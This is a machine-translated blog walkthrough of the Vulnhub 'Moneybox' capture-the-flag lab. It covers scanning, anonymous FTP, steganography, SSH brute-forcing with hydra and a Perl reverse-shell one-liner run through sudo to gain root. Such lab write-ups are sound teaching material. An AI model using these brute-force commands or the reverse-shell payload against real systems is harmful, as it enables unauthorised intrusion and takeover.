当前位置:网站首页>Vulnhub-Moneybox
Vulnhub-Moneybox
2022-07-05 15:37:00 【GALi_ two hundred and thirty-three】
Description
The target plane comes from vulnhub MONEYBOX 1 . Present in the target 3 individual flag, The goal this time is to get this 3 individual flag, Don't talk too much. Let's start .
Scanning and service identification
Target and Kali In the same network segment , Through two-layer scanning (arp-scan) Survival of the same network segment IP
sudo arp-scan -I eth0 -l # -I network card -l Local network
By judgment ,192.168.54.250 For the target address .
Scan the open port of the target
sudo nmap -p- 192.168.54.250
Find out 21,22,80 port , Service identification of these ports
sudo nmap -p21,22,80 -sV 192.168.54.250
Found that the goal is open ftp service ,ssh as well as web service
Vulnerability scanning
Use nmap Use the default script to scan for service vulnerabilities
sudo nmap -p21 -sC 192.168.54.250 # -sC Default script
The scan found ftp Anonymous login vulnerability exists
ssh and http The service found nothing unusual
Sorting and analysis
Anonymous user login
First use the anonymous login vulnerability found
Use the account and password anonymous/anonymous Landing successful , And found a picture trytofind.jpg
Download the picture locally ( Pictures may contain some information )
visit web service
View source discovery , No information was found
Catalog explosion
Website directory (dirsearch Need to install )
dirsearch -u http://192.168.54.250/
Found a blog page
According to the content of the page , Tips found in the page source code , There is a secret directory S3cr3t-T3xt
Access directory
A key is found in the source code of the page 3xtr4ctd4t4
Picture steganography
adopt strings Command to check whether there is any obvious character information in the picture
strings trytofind.jpg
Although I didn't see the obvious information directly , But see abnormal characters , What is inserted in the guest picture
use steghide Look at the inserted data
steghide info trytofind.jpg
Find out you need a password , Use the previously obtained key 3xtr4ctd4t4 Try
success , Found that there was a data.txt file
Extract information
steghide extract -sf trytofind.jpg
ssh Blast
see data file
Find several keyword eyes , The person's name renu, The password is weak , Can be judged renu It may be an account with weak password , It can be brutally cracked
First, find a dictionary (/usr/share/wordlists/rockyou.txt.gz)
cp /usr/share/wordlists/rockyou.txt.gz .
gunzip rockyou.txt.gz
You can use it here nmap Of ssh Blasting script , It can also be used. hydra
nmap --script ssh-brute --script-args userdb=user.txt,passdb=rockyou.txt 192.168.54.250
Use hydra
hydra -l renu -P rockyou.txt 192.168.54.250 ssh
Crack success
The account password is renu/987654321
obtain Flag
ssh Connect to renu account number
View directory
Successfully get the first Flag
Try sudo To root user
Because it is not in the super user group , Not enough permissions
View history command history
history
Find a lily user , And have passed ssh Traces of landing
Get into home In the directory lily User files , Find the second Flag
Get into lily Under the .ssh The folder and renu Of .ssh Folder
Find out lily Of authorized_keys There is renu The public key , therefore renu You can go directly through ssh Log in to lily account number .
see lily User's permission information
Find out lily Users can use... Without using a password Perl Program
stay kali On the monitor 3334 port
nc -nvlp 3334
utilize perl Program running rebound shell
sudo perl -e 'use Socket;$i="192.168.54.103";$p=3334;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Successful connection , get root jurisdiction
Get into root root directory
Find out .root.txt file , Get the last Flag
边栏推荐
- "Sequelae" of the withdrawal of community group purchase from the city
- Xiao Sha's arithmetic problem solving Report
- CSDN I'm coming
- Creation and use of thymeleaf template
- 把 ”中台“ 的思想迁移到代码中去
- Huiyuan, 30, is going to have a new owner
- Talk about your understanding of microservices (PHP interview theory question)
- episodic和batch的定义
- 机械臂速成小指南(九):正运动学分析
- Stop B makes short videos, learns Tiktok to die, learns YouTube to live?
猜你喜欢
Number protection AXB function! (essence)
keep-alive
sql server学习笔记
Data communication foundation - routing communication between VLANs
Codasip为RISC-V处理器系列增加Veridify安全启动功能
你童年的快乐,都是被它承包了
Nine hours, nine people, nine doors problem solving Report
Appium自动化测试基础 — APPium基础操作API(二)
30岁汇源,要换新主人了
Ten billion massage machine blue ocean, difficult to be a giant
随机推荐
爱可可AI前沿推介(7.5)
How to introduce devsecops into enterprises?
Summary of the second lesson
Good article inventory
Transfer the idea of "Zhongtai" to the code
Bugku alert
How can I quickly check whether there is an error after FreeSurfer runs Recon all—— Core command tail redirection
Common interview questions about swoole
Memo 00
Live broadcast preview | how to implement Devops with automatic tools (welfare at the end of the article)
PHP high concurrency and large traffic solution (PHP interview theory question)
可转债打新在哪里操作开户是更安全可靠的呢
【簡記】解决IDE golang 代碼飄紅報錯
mapper.xml文件中的注释
Common redis data types and application scenarios
如何将 DevSecOps 引入企业?
Number protection AXB function! (essence)
MySQL giant pit: update updates should be judged with caution by affecting the number of rows!!!
Noi / 1.4 07: collect bottle caps to win awards
queryRunner. Query method